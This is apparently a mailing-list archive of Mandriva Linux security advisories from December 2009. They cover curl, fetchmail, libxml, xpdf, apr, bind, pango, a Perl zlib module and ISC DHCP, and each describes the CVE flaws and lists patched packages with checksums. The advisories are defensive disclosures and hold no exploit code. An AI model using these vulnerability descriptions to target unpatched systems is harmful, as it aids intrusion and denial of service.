[Full-disclosure] [ MDVSA-2009:203-1 ] curl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:203-1 http://www.mandriva.com/security/ ___ Package : curl Date: December 4, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability has been found and corrected in curl: lib/ssluse.c in cURL and libcurl 7.4 through 7.19.5, when OpenSSL is used, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408 (CVE-2009-2417). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2417 ___ Updated Packages: Mandriva Linux 2008.0: d1711e92c3f50c541bad2ebc92e1997e 2008.0/i586/curl-7.16.4-2.2mdv2008.0.i586.rpm 7483d1c5e09cbdaa4091f7e005f844a1 2008.0/i586/libcurl4-7.16.4-2.2mdv2008.0.i586.rpm 59374804184515524a92e7032c15e27f 2008.0/i586/libcurl-devel-7.16.4-2.2mdv2008.0.i586.rpm 82c7f004df0b5410c1bd0e4f245abf17 2008.0/SRPMS/curl-7.16.4-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 60168194a95389f0eef488361e9c41c6 2008.0/x86_64/curl-7.16.4-2.2mdv2008.0.x86_64.rpm c7957352289282f49d0a749022d43309 2008.0/x86_64/lib64curl4-7.16.4-2.2mdv2008.0.x86_64.rpm 53be863ff6e89077c114c87646bf6435 2008.0/x86_64/lib64curl-devel-7.16.4-2.2mdv2008.0.x86_64.rpm 82c7f004df0b5410c1bd0e4f245abf17 2008.0/SRPMS/curl-7.16.4-2.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGFUgmqjQ0CJFipgRAmDvAKC9VSBsewBvAVxsvV4C0wnJ1xxdgwCfbhCU IIyhdmnx2hBsXaVD3NWitv8= =Nvbn -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:201-1 ] fetchmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:201-1 http://www.mandriva.com/security/ ___ Package : fetchmail Date: December 4, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability has been found and corrected in fetchmail: socket.c in fetchmail before 6.3.11 does not properly handle a '\0' (NUL) character in a domain name in the subject's Common Name (CN) and subjectAlt(ernative)Name fields of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408 (CVE-2009-2666). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2666 ___ Updated Packages: Mandriva Linux 2008.0: 3f4057bfc548c1dccf0d3f9bc4fe8f85 2008.0/i586/fetchmail-6.3.8-4.2mdv2008.0.i586.rpm 76bf19b1f8772966c5044109c348da26 2008.0/i586/fetchmailconf-6.3.8-4.2mdv2008.0.i586.rpm e3e362ecde9e175a34d1df8d2188d59f 2008.0/i586/fetchmail-daemon-6.3.8-4.2mdv2008.0.i586.rpm 1822d2316b99f4ffaa18e482ed29c7f6 2008.0/SRPMS/fetchmail-6.3.8-4.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: a0f3f51fd21b8b002c55e7a189cfe4b4 2008.0/x86_64/fetchmail-6.3.8-4.2mdv2008.0.x86_64.rpm 31842cc17128e39c0626c6ce49b2b1e8 2008.0/x86_64/fetchmailconf-6.3.8-4.2mdv2008.0.x86_64.rpm 729ad2f72304f5611c67095bac5d 2008.0/x86_64/fetchmail-daemon-6.3.8-4.2mdv2008.0.x86_64.rpm 1822d2316b99f4ffaa18e482ed29c7f6 2008.0/SRPMS/fetchmail-6.3.8-4.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGFJGmqjQ0CJFipgRAiJLAJ9AT7DMQJoM2Ogh8Jy4KQukg+9AuQCfY/eE rt2NtIHert3paSccxoYh9pI= =VakF -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:200-1 ] libxml
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:200-1 http://www.mandriva.com/security/ ___ Package : libxml Date: December 4, 2009 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in libxml: Stack consumption vulnerability in libxml2 2.5.10, 2.6.16, 2.6.26, 2.6.27, and 2.6.32, and libxml 1.8.17, allows context-dependent attackers to cause a denial of service (application crash) via a large depth of element declarations in a DTD, related to a function recursion, as demonstrated by the Codenomicon XML fuzzing framework (CVE-2009-2414). Multiple use-after-free vulnerabilities in libxml2 2.5.10, 2.6.16, 2.6.26, 2.6.27, and 2.6.32, and libxml 1.8.17, allow context-dependent attackers to cause a denial of service (application crash) via crafted (1) Notation or (2) Enumeration attribute types in an XML file, as demonstrated by the Codenomicon XML fuzzing framework (CVE-2009-2416). This update provides a solution to these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2414 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416 ___ Updated Packages: Mandriva Linux 2008.0: 4c418296249dc8cc94b1b15e49b2d429 2008.0/i586/libxml1-1.8.17-11.1mdv2008.0.i586.rpm 7f55b33d9357641ccfbe9421c2818dc8 2008.0/i586/libxml1-devel-1.8.17-11.1mdv2008.0.i586.rpm 415af7a47df0783359018e7c8818123b 2008.0/i586/libxml2_2-2.6.30-1.6mdv2008.0.i586.rpm 44c479adb1d416beb45380e10398e350 2008.0/i586/libxml2-devel-2.6.30-1.6mdv2008.0.i586.rpm affb65b84643897980a4db16bac8262d 2008.0/i586/libxml2-python-2.6.30-1.6mdv2008.0.i586.rpm 517f2690932d66302975469282a7f624 2008.0/i586/libxml2-utils-2.6.30-1.6mdv2008.0.i586.rpm 1df8e776ad34bdfe5b68437e45718ff8 2008.0/SRPMS/libxml-1.8.17-11.1mdv2008.0.src.rpm f9eee25ac518012b01c9f54fbab3b3d8 2008.0/SRPMS/libxml2-2.6.30-1.6mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5dcd354e680675ffd08c9f0d562e5686 2008.0/x86_64/lib64xml1-1.8.17-11.1mdv2008.0.x86_64.rpm 9ef4286da3bf35a2b07d1a86d63b577b 2008.0/x86_64/lib64xml1-devel-1.8.17-11.1mdv2008.0.x86_64.rpm 09b50a18697fc91e9c801c3a8ffe83b4 2008.0/x86_64/lib64xml2_2-2.6.30-1.6mdv2008.0.x86_64.rpm 4453c937d9dfabdc9526f253fe0a14aa 2008.0/x86_64/lib64xml2-devel-2.6.30-1.6mdv2008.0.x86_64.rpm 2ab42a3413a471384a6e280d7afc3c90 2008.0/x86_64/libxml2-python-2.6.30-1.6mdv2008.0.x86_64.rpm 3e3127451a7348e2ef8e4990122c3518 2008.0/x86_64/libxml2-utils-2.6.30-1.6mdv2008.0.x86_64.rpm 1df8e776ad34bdfe5b68437e45718ff8 2008.0/SRPMS/libxml-1.8.17-11.1mdv2008.0.src.rpm f9eee25ac518012b01c9f54fbab3b3d8 2008.0/SRPMS/libxml2-2.6.30-1.6mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGE/cmqjQ0CJFipgRAk/PAKCz43qimvWl4XvfLCAWGlKd7OlgHACgsV/X APy0BqGd7fLxPXDfkwOAKKg= =tR4I -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:287-1 ] xpdf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:287-1 http://www.mandriva.com/security/ ___ Package : xpdf Date: December 4, 2009 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in xpdf: Integer overflow in the SplashBitmap::SplashBitmap function in Xpdf 3.x before 3.02pl4 and Poppler before 0.12.1 might allow remote attackers to execute arbitrary code via a crafted PDF document that triggers a heap-based buffer overflow. NOTE: some of these details are obtained from third party information. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2009-1188 (CVE-2009-3603). The Splash::drawImage function in Splash.cc in Xpdf 2.x and 3.x before 3.02pl4, and Poppler 0.x, as used in GPdf and kdegraphics KPDF, does not properly allocate memory, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document that triggers a NULL pointer dereference or a heap-based buffer overflow (CVE-2009-3604). Integer overflow in the PSOutputDev::doImageL1Sep function in Xpdf before 3.02pl4, and Poppler 0.x, as used in kdegraphics KPDF, might allow remote attackers to execute arbitrary code via a crafted PDF document that triggers a heap-based buffer overflow (CVE-2009-3606). Integer overflow in the ObjectStream::ObjectStream function in XRef.cc in Xpdf 3.x before 3.02pl4 and Poppler before 0.12.1, as used in GPdf, kdegraphics KPDF, CUPS pdftops, and teTeX, might allow remote attackers to execute arbitrary code via a crafted PDF document that triggers a heap-based buffer overflow (CVE-2009-3608). Integer overflow in the ImageStream::ImageStream function in Stream.cc in Xpdf before 3.02pl4 and Poppler before 0.12.1, as used in GPdf, kdegraphics KPDF, and CUPS pdftops, allows remote attackers to cause a denial of service (application crash) via a crafted PDF document that triggers a NULL pointer dereference or buffer over-read (CVE-2009-3609). This update fixes these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3603 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3604 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3606 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3608 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3609 ___ Updated Packages: Mandriva Linux 2008.0: 83c9a032b3183ea645e58c0d0f5143ff 2008.0/i586/xpdf-3.02-8.3mdv2008.0.i586.rpm 5f86604d615e3872176cec6aa6f27f60 2008.0/i586/xpdf-common-3.02-8.3mdv2008.0.i586.rpm 81a9a7f617d000ada7ce3f3ad34667b3 2008.0/i586/xpdf-tools-3.02-8.3mdv2008.0.i586.rpm ee385f975678b5fd6f5fb427d16f7b44 2008.0/SRPMS/xpdf-3.02-8.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5a9c4a901fbe84c6a8fe3de44fd3cf78 2008.0/x86_64/xpdf-3.02-8.3mdv2008.0.x86_64.rpm c193e9fd9fe46c3f433ecf8eaddb6944 2008.0/x86_64/xpdf-common-3.02-8.3mdv2008.0.x86_64.rpm 4446036c4bbb8d8895d9cad41a38ff04 2008.0/x86_64/xpdf-tools-3.02-8.3mdv2008.0.x86_64.rpm ee385f975678b5fd6f5fb427d16f7b44 2008.0/SRPMS/xpdf-3.02-8.3mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGEpvmqjQ0CJFipgRAu4tAKDh5lUdwfU9ZVGfn1RgZPfnD5rjUgCggv8u +lOKwrO5RFXbqUDTcXm3Ikk= =Ivf3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:314 ] apr
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:314 http://www.mandriva.com/security/ ___ Package : apr Date: December 4, 2009 Affected: 2008.0 ___ Problem Description: Multiple security vulnerabilities has been identified and fixed in apr and apr-util: Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR; or crafted calls to the (3) apr_rmm_malloc, (4) apr_rmm_calloc, or (5) apr_rmm_realloc function in misc/apr_rmm.c in APR-util; leading to buffer overflows. NOTE: some of these details are obtained from third party information (CVE-2009-2412). The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, related to an underflow flaw. (CVE-2009-0023). The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564 (CVE-2009-1955). Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input (CVE-2009-1956). Packages for 2008.0 are being provided due to extended support for Corporate products. The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0023 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1956 ___ Updated Packages: Mandriva Linux 2008.0: d55d5dd456de0c7977f93bff217406d7 2008.0/i586/apr-util-dbd-mysql-1.2.10-1.1mdv2008.0.i586.rpm bd02eb2233dcc07aadd7e5eb84df9ce8 2008.0/i586/apr-util-dbd-pgsql-1.2.10-1.1mdv2008.0.i586.rpm 334e127fb8ac03379c8a5f2ee7c144b6 2008.0/i586/apr-util-dbd-sqlite3-1.2.10-1.1mdv2008.0.i586.rpm 4307983fb3d21ab0f9955711e116f92e 2008.0/i586/libapr1-1.2.11-1.1mdv2008.0.i586.rpm ff24f1e1587f2210346ea134d4a2053e 2008.0/i586/libapr-devel-1.2.11-1.1mdv2008.0.i586.rpm 3d50a85109e011ced9e36f1565e9bc69 2008.0/i586/libapr-util1-1.2.10-1.1mdv2008.0.i586.rpm b786e2329fc63d459b841bf001261543 2008.0/i586/libapr-util-devel-1.2.10-1.1mdv2008.0.i586.rpm 6ef7669ea3d0db3dbaed35f35ae2dbdc 2008.0/SRPMS/apr-1.2.11-1.1mdv2008.0.src.rpm 1a923fc9c2f912ef339b942a59bff4e6 2008.0/SRPMS/apr-util-1.2.10-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 91588bbcf3940cd106b0fe458be6d4b9 2008.0/x86_64/apr-util-dbd-mysql-1.2.10-1.1mdv2008.0.x86_64.rpm b71d8b14cc536cf8a2448b353d2b4047 2008.0/x86_64/apr-util-dbd-pgsql-1.2.10-1.1mdv2008.0.x86_64.rpm 10b889bb625dbae01711ed7e8e101744 2008.0/x86_64/apr-util-dbd-sqlite3-1.2.10-1.1mdv2008.0.x86_64.rpm 068334fc392c68f9b29e629dd3776f83 2008.0/x86_64/lib64apr1-1.2.11-1.1mdv2008.0.x86_64.rpm a9ed011d8b421e8604e66a87a4972477 2008.0/x86_64/lib64apr-devel-1.2.11-1.1mdv2008.0.x86_64.rpm c08da53c4c88464249f46c6577f3c2a8 2008.0/x86_64/lib64apr-util1-1.2.10-1.1mdv2008.0.x86_64.rpm 4b1b86a3e07f4b87a1a53f0dbaaa3aff 2008.0/x86_64/lib64apr-util-devel-1.2.10-1.1mdv2008.0.x86_64.rpm 6ef7669ea3d0db3dbaed35f35ae2dbdc 2008.0/SRPMS/apr-1.2.11-1.1mdv2008.0.src.rpm 1a923fc9c2f912ef339b942a59bff4e6 2008.0/SRPMS/apr-util-1.2.10-1.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team
[Full-disclosure] [ MDVSA-2009:313-1 ] bind
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:313-1 http://www.mandriva.com/security/ ___ Package : bind Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Some vulnerabilities were discovered and corrected in bind: Unspecified vulnerability in ISC BIND 9.4 before 9.4.3-P4, 9.5 before 9.5.2-P1, 9.6 before 9.6.1-P2, 9.7 beta before 9.7.0b3, and 9.0.x through 9.3.x with DNSSEC validation enabled and checking disabled (CD), allows remote attackers to conduct DNS cache poisoning attacks via additional sections in a response sent for resolution of a recursive client query, which is not properly handled when the response is processed at the same time as requesting DNSSEC records (DO). (CVE-2009-4022). Additionally BIND has been upgraded to the latest point release or closest supported version by ISC. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4022 https://www.isc.org/node/504 ___ Updated Packages: Mandriva Linux 2008.0: 9cd003fb37a121f79e78b1c14094b7db 2008.0/i586/bind-9.4.3-0.1mdv2008.0.i586.rpm 7f07d510e3a8e1dfe311020bf86b599f 2008.0/i586/bind-devel-9.4.3-0.1mdv2008.0.i586.rpm fb8c5352c8a603bdd3f89e6051a2c48e 2008.0/i586/bind-utils-9.4.3-0.1mdv2008.0.i586.rpm a82b381cd9675db308d95aee3fa5502f 2008.0/SRPMS/bind-9.4.3-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 1ac44bf21e8144fb7c4bf49b0c9e094f 2008.0/x86_64/bind-9.4.3-0.1mdv2008.0.x86_64.rpm 2453e9625b1852561f6b6b6ebf17fdb2 2008.0/x86_64/bind-devel-9.4.3-0.1mdv2008.0.x86_64.rpm f8f5a39a4d1b33fef6a5441288fe0aa7 2008.0/x86_64/bind-utils-9.4.3-0.1mdv2008.0.x86_64.rpm a82b381cd9675db308d95aee3fa5502f 2008.0/SRPMS/bind-9.4.3-0.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGD4rmqjQ0CJFipgRAhfBAKDM3qLy6hw6/OjXZ18RCpj1hlxD0QCgiovL RJQHrdXqJsbK3toYp4tvwDQ= =CnAu -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:158-3 ] pango
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:158-3 http://www.mandriva.com/security/ ___ Package : pango Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Integer overflow in the pango_glyph_string_set_size function in pango/glyphstring.c in Pango before 1.24 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long glyph string that triggers a heap-based buffer overflow. This update corrects the issue. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1194 ___ Updated Packages: Mandriva Linux 2008.0: 5fa3cde904bb3471f2808597d4495a90 2008.0/i586/libpango1.0_0-1.18.2-1.1mdv2008.0.i586.rpm 70cd4862c5bc27ff2548ea082ef2562b 2008.0/i586/libpango1.0_0-modules-1.18.2-1.1mdv2008.0.i586.rpm 06a9a5a78ffa999cb12bd5de367789cc 2008.0/i586/libpango1.0-devel-1.18.2-1.1mdv2008.0.i586.rpm 77ca034f4f673aef5ef9a147e7fd6b10 2008.0/i586/pango-1.18.2-1.1mdv2008.0.i586.rpm d57f4104fd1607dca80c7d4e8d775ae7 2008.0/i586/pango-doc-1.18.2-1.1mdv2008.0.i586.rpm 1d01963df79f7762776dc35e4023ea5b 2008.0/SRPMS/pango-1.18.2-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 1fdf6ef81c94fee53da3c154709483ad 2008.0/x86_64/lib64pango1.0_0-1.18.2-1.1mdv2008.0.x86_64.rpm 2a5831a2e8bdc4dcce62f8ecbe9f1dfd 2008.0/x86_64/lib64pango1.0_0-modules-1.18.2-1.1mdv2008.0.x86_64.rpm 18803302ca6edff9c50f9bb66e095e80 2008.0/x86_64/lib64pango1.0-devel-1.18.2-1.1mdv2008.0.x86_64.rpm 56a5dff6f3dc09912b22ea955970ae1c 2008.0/x86_64/pango-1.18.2-1.1mdv2008.0.x86_64.rpm 2b2fc7e5a1c7597dead4d6138089f7c3 2008.0/x86_64/pango-doc-1.18.2-1.1mdv2008.0.x86_64.rpm 1d01963df79f7762776dc35e4023ea5b 2008.0/SRPMS/pango-1.18.2-1.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGDftmqjQ0CJFipgRAuWMAJ4/ig6FYR6485O/yz4etEfyCTIySgCghpQU pNTF7F5vkWFvFfi8GU78a0E= =sn6S -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:157-1 ] perl-Compress-Raw-Zlib
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:157-1 http://www.mandriva.com/security/ ___ Package : perl-Compress-Raw-Zlib Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability has been found and corrected in perl-Compress-Raw-Zlib: Off-by-one error in the inflate function in Zlib.xs in Compress::Raw::Zlib Perl module before 2.017, as used in AMaViS, SpamAssassin, and possibly other products, allows context-dependent attackers to cause a denial of service (hang or crash) via a crafted zlib compressed stream that triggers a heap-based buffer overflow, as exploited in the wild by Trojan.Downloader-71014 in June 2009 (CVE-2009-1391). This update provides fixes for this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1391 ___ Updated Packages: Mandriva Linux 2008.0: c48dda4bf47776f250c73e2af40e3ceb 2008.0/i586/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.i586.rpm 65d8176b3c1285376533c0f16d5d264c 2008.0/SRPMS/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: e6eeabfbd6bd0b9afe54fde0374327a1 2008.0/x86_64/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.x86_64.rpm 65d8176b3c1285376533c0f16d5d264c 2008.0/SRPMS/perl-Compress-Raw-Zlib-2.006-1.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGDVSmqjQ0CJFipgRAmACAKDISShfYkpOrXwSKS9lGpxVI7FVygCg37Sj JISnjBHYvGdRn5Rj6anhHSg= =9AfA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:312 ] dhcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:312 http://www.mandriva.com/security/ ___ Package : dhcp Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability has been found and corrected in ISC DHCP: Integer overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before 3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528; allows remote attackers to cause a denial of service (daemon crash) or execute arbitrary code via a malformed DHCP packet with a large dhcp-max-message-size that triggers a stack-based buffer overflow, related to servers configured to send many DHCP options to clients (CVE-2007-0062). Stack-based buffer overflow in the script_write_params method in client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option (CVE-2009-0692). ISC DHCP Server is vulnerable to a denial of service, caused by the improper handling of DHCP requests. If the host definitions are mixed using dhcp-client-identifier and hardware ethernet, a remote attacker could send specially-crafted DHCP requests to cause the server to stop responding (CVE-2009-1892). Packages for 2008.0 are being provided due to extended support for Corporate products. This update provides fixes for this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892 ___ Updated Packages: Mandriva Linux 2008.0: 3081299715b66778098307681861d6d7 2008.0/i586/dhcp-client-3.0.7-0.1mdv2008.0.i586.rpm 65893c30e369cb54df581508c0a278ce 2008.0/i586/dhcp-common-3.0.7-0.1mdv2008.0.i586.rpm c7891651d44f4c66967789a594cb494f 2008.0/i586/dhcp-devel-3.0.7-0.1mdv2008.0.i586.rpm 6ddeab5add9a44c4c0d97fc98e98b48f 2008.0/i586/dhcp-doc-3.0.7-0.1mdv2008.0.i586.rpm 2c3e9e31d4c99a3622ce4c029ce7d5f9 2008.0/i586/dhcp-relay-3.0.7-0.1mdv2008.0.i586.rpm e9271dcc129000708f9537a5ad3a926f 2008.0/i586/dhcp-server-3.0.7-0.1mdv2008.0.i586.rpm 2a2e6cca8ab0d7c62e14aa19116ac860 2008.0/SRPMS/dhcp-3.0.7-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 137eaf194b2faa3a8de3b90453c47793 